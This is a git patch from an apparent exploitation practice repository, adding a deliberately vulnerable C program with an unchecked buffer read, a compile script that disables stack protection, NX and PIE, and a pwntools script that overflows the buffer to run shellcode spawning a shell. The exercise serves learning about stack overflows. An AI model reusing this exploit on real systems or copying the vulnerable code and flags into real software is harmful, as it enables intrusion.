From 6bec98d2e1100da9a9b6bb4be1859604afeda743 Mon Sep 17 00:00:00 2001
From: Jack Ren <bjrjk@qq.com>
Date: Mon, 30 Aug 2021 22:56:18 +0800
Subject: [PATCH] Finished stackoverflow/no-protection

---
 .gitignore                                      |   3 +++
 stackoverflow/no-protection/answer.py           |  15 +++++++++++++++
 stackoverflow/no-protection/compile.sh          |   2 ++
 stackoverflow/no-protection/hello               | Bin 0 -> 11096 bytes
 stackoverflow/no-protection/hello.c             |  13 +++++++++++++
 stackoverflow/no-protection/payload.txt         | Bin 0 -> 128 bytes
 .../no-protection/peda-session-hello.txt        |   2 ++
 7 files changed, 35 insertions(+)
 create mode 100644 stackoverflow/no-protection/answer.py
 create mode 100755 stackoverflow/no-protection/compile.sh
 create mode 100755 stackoverflow/no-protection/hello
 create mode 100644 stackoverflow/no-protection/hello.c
 create mode 100644 stackoverflow/no-protection/payload.txt
 create mode 100644 stackoverflow/no-protection/peda-session-hello.txt

diff --git a/.gitignore b/.gitignore
index c6127b3..11042af 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,3 +1,6 @@
+# gdb
+.gdb_history
+
 # Prerequisites
 *.d
 
diff --git a/stackoverflow/no-protection/answer.py b/stackoverflow/no-protection/answer.py
new file mode 100644
index 0000000..b18284f
--- /dev/null
+++ b/stackoverflow/no-protection/answer.py
@@ -0,0 +1,15 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+import os
+context.log_level="debug"
+context(arch="amd64",os="linux")
+
+p=process('./hello')
+shellcode=asm(shellcraft.sh())
+len_sc=len(shellcode)
+payload=0x48*'0'+p64(0x00007ffff7a08118)+shellcode
+with open('payload.txt', 'w') as f:
+	f.write(payload)
+p.sendline(payload)
+p.interactive()
diff --git a/stackoverflow/no-protection/compile.sh b/stackoverflow/no-protection/compile.sh
new file mode 100755
index 0000000..87b9dad
--- /dev/null
+++ b/stackoverflow/no-protection/compile.sh
@@ -0,0 +1,2 @@
+#!/bin/sh
+gcc hello.c -g -o hello -zexecstack -fno-stack-protector -no-pie
diff --git a/stackoverflow/no-protection/hello b/stackoverflow/no-protection/hello
new file mode 100755
index 0000000000000000000000000000000000000000..801daf5484db8b88584cf2e153d4281227fd8802
GIT binary patch
literal 11096
zcmeHNeQX?8wZF5oUa!~jdSmCqNq}rh0xsb7NAuwl((F31vqnxDQm3?nWV|0^dtcVG
z`*vsDxahShNlR8FCFM(@0?AYYMM8WO#8Vy;kPy_5C;mvEK$I`3R1Go@N`q+o5T)_^
zojdoe$K$p7BqZKHxyj5q=XcLJ_uP-!Irokq92^<)X`0~T6L$!b4*KH~a_&Mre~T0q
z)-RewT-+iyi2x8kuDGlr>Tpc|s$4S-Dm@*P?D~BU(C>>&hUwcJSTN-Xi8iP@hs2fS
z(9?~M$W(}^1jvqJjfABLIwl#WohptVMcIx-vWqIasIp^vRRzYB`$v7FYgG9g^~E8P
z948|7%KHK(T`C8!*;(SF)TpHKMRYm455Z1#UFyHpEus_-srHr|m+Pv3OqD3Q^SSi)
zt=;)-S3YM|j&~jJ-`=%-Yph&|^~rvdf70D|;IM3o=9`C>`nL)fVO0N-4Zq(1+a0IA
z{@i~&^T6D{KJ-7Azw+vr$d)g#|L4*S&9*w)gw?~>E`x6a9>uk!px+tl=5|pm<t%$#
zl+09C7zW`+*-n*gV=9%i#J-W?fjvfFtS`0=wG&eXOVt{1>68D+w<iB#U8;sE>vK(1
zf2)$Ow~k4UmII9!m%qAjUOQCR5gC&zv=(UmxI|qz&jZyZPyR8O{A9z+%~6qj_>%3L
zznVPx<KPuG6Z6|%MAiJ3mvC?07zao4B-Q`^g?W@Mza*KO`u$aiy)O?}pF5hYzL-4u
z()EL*!%trlfw)LMefeAik*A9w^Q)&}^J?oxEatyl8IQGYJSE#B|A#O3Bhut9d9Plx
z*IuM53a#bH4+)%qLE0U;GA`*42s@m7=ugTZdHIH(tX@xEp4*+&o=QG<!(LtU(7fP5
zu>FZ$y@*9r)*en)ugyJx9z4~s5r}r=ii(e-T8NR<j{KoY1Va~3o*lgOy*W%wvij5y
zDbl$=+?byy6hQLqt|tM>_UEnuKlkhvWf-ac+uxJb%JsSLphc<htkYiN!->0xt3OX1
zPK=J6-C_l!=-k;ZqIV^#Zw^;qAGwtp4kj<Zsn6}EwjO@jj`seF$8e<jw~^}Wd#kS`
z=2!hXdGd;uy!|(o|E4+p$dSZH6Gsw96ULQu3;p>Erds+_v#w$7CCz-k5ZzJ^A$V<r
zz7x|V<Zla_n+4wkItDrhdIoeY`tS_sLC`tSB4`jRg4V}DwFv2Xr=s0|NNC3++J+U4
z!E;(;gw{R%#y|7s{QP@K0j0jK^Nf)0PoT?dcr)Z4T=xJYD#DSWaK{H*o9_#r5WCm!
ze9vv0Zy}iM?!mPWG2c!=A{=?dx2GjwBM^vGe;gO}X#;4j{%)t9#^AiFH>rLg9Ql-Q
zAl&h&J{XRk^$&zQ&om^%J&y#E;r^42`@`{4xIYo@NrXEG!cpi!e;^!`&-n{5KaF;{
z59ID<xj6ziN8siN+#G?MBk=z@0zJsjWKmSTzH7PU3J%Wi=(Q->A8_P#O6Gl)e3t^F
zcPy3l4iOz{A4Tt7DqR2Cjrjt}=Y4S^wY^@C?#OCeBrf_KnQ{~=^nRv7`9GBohltgR
zGO6XzDj()|u*@Bx#JPvecOcXLfXY?XKI5}W=D67&$-6AvK3?;(KPQwvQX(m9O7FUo
zZB?(}e;VO^thd4KYJP_l_15p(v*-QM&co@7Wmlp*V%uUpUAI-F)cZhhf2?Qgtqv;Q
z2TNy=ouS&H7S^cOqmrM*4EZG=)IJ2m72n0}2>|sBeLGO$d%hocJ=pjo463dLHxltR
zev^p5@o5PLHc7Cd3z~j^12%3jX!rtIzd<!;a>Tw!>{((Pf`Q<ppt=_51lUM?kd6SJ
z_rJCt0X2<)_rIRTT{L|kfd7rtV1rE$68?AMBTZWgf0Ou*rn}+Ae}njF(;cKUPkd+S
zr-TcQgr3kkGSH;ZAF5D|PYUtSXQ{?7g=9!4p+O1<Ls4=TkitEoX%d3kAt;Q6UL^-1
z?H&k|p+AzaLQ6xT7<v~uh)BT>wNp)-Rz%J5&@afr8f^&VL}-B2)@n3U9}kU?T8DNN
z*vZgmNbPN!1>tmPE!Aw%J_hVu=nM&6+9MFohdx6>ObWB1$4Tgx!iCV6N$8Qnw?Y?4
z=+kI!E{0;%=xs8#OCghLwrMu7AB*N+P}SqX1i%jeEOoN!5mNXvv7)Jk_$R2l!6u#f
zuciS<L?E~cSRnW~q!l!g6m|=(8A53`C3=d{b`gFJRjqyGW4A_l>s<i+afiP~d_wYp
z;O8JTejO^2cHA01LCr`0i`dhWJ%jp&s$}V>B(Oe>`-<;C;T2pfMdM2#ktc8qY#^jH
zLk@58HRCY|1Zi1B=qD$*S+d|nurE!hh3JAiB>N561$PqL_7G4lL@aHzsqhc5_Qj9E
zWqVgm!S`6copxzjh}!Z!HYQe0L0|LpgC@60gnaP=6juKyTG1Ma)gSxTgJKPhq#VVa
zz*lNp!tKp^ctd!l*47w7SAA=Q9)5rG&gS8ESZo%}&3B+4Bd6FP#-$Y~x=Dnz8s8;|
z1lu(|+}upI8pNiSnxlSbhm_bb+)iRMH-k~twBdHLXxRim-KY$=!}J4qCADsKe86b;
zIszgJK)VjGaud4K7SndGbE1Cty5V-}O1$Iq1MA3XdqXV@AAa0dxm6b_u3m6Wifbq;
z`2I64pLh;;O?xBUg1d&nr}wJXT`8C7Jgs{olj+7mnz4PWI#rvnD&0G}b5<r_$(lmy
zDPgHzI%k&`so=4vjeIPFW<=S}X3g=~BsFNy6wNYNOek8-6&w~ClEnm<XUc|ID&=!!
z+o`KqV6)&+Ibqs`qHSafCDW<I6#00~tUeXIH(0sj+P(MseCQ$+b5>S>q)HRQ7{1dO
z8Xg&x{w*{hk#cI<G)!ofCkrJzN<Yoz-2J9u%i8-&IomXfHgw1Hsfn@#`;1;3rezBi
z+rZhHX-(%!1xwtOnvo|L0taxVV`j<GrQ<ory`7a!<_no)B44m3WK-Rfg(<W9Us9Q4
zCDZCI-e+~?%~Z+CSrgqj%*z}rOq-?geBr)stI$;}6>KwO=g^jssgy7T`N|Y{bW25q
z1`v_zrcumS5JRz07U=!7Fv{u5xG)O&tWg*rFPpZgSmoS=WoDz9$yAAyGHz!%%kky(
z2Ie$A(ghlD#wDF9o5HAAm9m-bqhaPjg_`WNJc=|d^EgJ+D5kQ#4(W5qZ4TM$kZo!P
zYEjWt$bnjfQ1_hHY0?bp%l54_TjROBX%#RulXU(mE7T;WF_4v_A)}>b=8PG|=yX8N
zEMl4}V3m`9IcZMaw4F-lO&&2E7f1K>_By#mv}?+)Smv$?6N@RAftV^~CU-eU(b2An
zXxBJqO->`vUBR{HoNyMFI*lLx*PfbMAhi1Isp5gulu6GKmYoce77{x6)<wrd*YArj
zQPlASj@HF>Vb{g|wY=EvOh=Y{v95kVaNfLFzfsi7H+5v;C-k^mRq{H%_RQABL$$ov
zZKP8cUMFwV#R?Ivi?`IiH!b!PMrspxLz34;tBBOaBlvDoPk*JDtc$nRz5}@%(M5Z0
zf3g@~h3`OPZb<Svb{Tw5@2=Fv8oX)h>8}-?b@2{C$JpMY3%s%F6uq{aT3o5uUiw~~
zcUxZk?TY~=>EazraJ)W{ul{-7TS5CmpJ);1Jo8IAGvSv!_$Gx5m8P&iO6WE0-gq3S
zJt{-Ev^w)bDGT|p?ORD1Wd@gqFFw2vl^|~Can*}|xqi(;UqhaDsxc03ajEC$8&aih
z$@-y>0~&Uh-u3g0()Y&sD~T^%&wrABmaZ#5I?#r35Ne&{-7d>9;8E;iz3Xii@Ca}o
zXQeK}($CW8ZiB>GYk_u4yrs4~yIocFFQfm#W$+wuipLx0H1Oy`b2aW^;46J=MUUrs
z`846K-v__4pbZC&&pEZ;<QYEdzK1J<^%nQ|d6M*fE#ib)w>+K&<%hqIzgPKx7C8Cw
zj_1#mzBe8JC2)%0tN%5rU+4ETQ?ko;Wqcgz9P$`*0tuN}GVCcMgIBbPJj2KqjEQ_9
zoyr?oyHF|{smgJYDNGgfrfp_pJGS56Utb9?ZYyV`N~P2cat6CJBgRX3)fw5!)YJ@2
zT#^Azdyy)qn1(TQD6xOg7(B4oprmY(BGQDt_Z~>>AKtULMt&{@gtxjem{cB;dk+a?
z-^iT<i4o(@p`p75M~%_Mz{ntZl^<C%<%$eh7-lwQr_^`Yc-;NPwU!G~Cb76`$){Rx
zH92*@)uP2kA8s+m<$^Jpva)$6Pm#%tLD`o(IO@AFvU#L2$PrS=U(r!JmobVtm>KDE
zS-E$zGh=lB9yM+vR-Tzc!UJlT96HGyvN5w%6fp})Xe==>+-0XGl!R?UEM3XrV|*?v
zVkAwb%9A3Now4B0p~zum4f5GCWw36+KpkRDk%8ihd0WI}M`AW*k1<*#s4K`JkC~Hd
zSxjbO%aUW^tPjV6c{ol@<uYis0AIMpWCM;f42XzfrA}e>Ay_kAnSfo&n!vJFV$K>b
zFrP}NOXf67`11pkc?^|$9RFcL+h#n9c(*u(^S6Elc;BR?>n`tvKpS_q=R9vz0a3Ry
zc>bMYxEGAup7TLE3Zb&uA+@{LelKcX$Jrvcf8H0Dy5|+Z@i#~mn{Gv!8~}q~p<4W$
zUtU!9$CY9Ll={y09SXl26r07GJ?Ei41fo!U?&2N4qo|~_QjVYVRa@Efxi81hdQ6YO
zp3YubKB32Db0?I2R7!YVg1X~Zu(%%#jVasDD*IVw&*#0|zPJCUl>LBmcvab7tz(b3
z`I7N_6d1)t@yVjzL%dMvFv(pgR(GjFaN9?feN-uO{A?3Z4Aakg?D>6nP}zT*oVyC!
zF+_)L?)Ev4_p1)^IXUZl<DXUbJpP>TN0fb-4Hfm;U+~yR197PtRrY(89TTtpzoUZU
z=k|I3FsbaLp8oUvv%gDVC`L8iwLFyn&dRILGSi>Hw$)|N-%C1F$5{_5varnbd7u<3
zx6gSe{~g;^6~F3EZT;~){uZ{R!uGtsxlTc$u%06=tY2>bcc^gN*Y-imu#*iHWjm&?
zc<ebZ>{Ry4wa;$p1ebhq{G4a?D?@IF_0@2&DE<bHu$~&?Fl>LT2WNYxbO6n~TQ#NH
z_xknfwk>1-n6m#acT73=+P`BN`=M2i!8<($9#On+8T*|2phn~CE?#@e{|WQ<^C<n;
zq0q6nyRf~RdQ_x(Qf-CD_&EehZSZ{Z`-gsCJVPYyFKm=V{Ei!P#3ggJavA$aH#r7-
I-opNW0SUhEf&c&j

literal 0
HcmV?d00001

diff --git a/stackoverflow/no-protection/hello.c b/stackoverflow/no-protection/hello.c
new file mode 100644
index 0000000..c0f9a47
--- /dev/null
+++ b/stackoverflow/no-protection/hello.c
@@ -0,0 +1,13 @@
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+void SayHello(void){
+    char tmpName[60];
+    read(0, tmpName, 1000);
+    printf("Hello %s\n", tmpName);
+}
+
+int main(int argc, char** argv){
+    SayHello();
+    return 0;
+}
diff --git a/stackoverflow/no-protection/payload.txt b/stackoverflow/no-protection/payload.txt
new file mode 100644
index 0000000000000000000000000000000000000000..5a7cd2348085278460ae2b0459cd3e4d70e63e43
GIT binary patch
literal 128
zcmXpopbn5|T=4yWJp)5lhQ|*5q|7{hef{D9kIv^AMVX9@jV3CLKw$VSEQ=$~gYj9I
ON9QxcOIg+t{Hy>nVIeR8

literal 0
HcmV?d00001

diff --git a/stackoverflow/no-protection/peda-session-hello.txt b/stackoverflow/no-protection/peda-session-hello.txt
new file mode 100644
index 0000000..8f39891
--- /dev/null
+++ b/stackoverflow/no-protection/peda-session-hello.txt
@@ -0,0 +1,2 @@
+break SayHello
+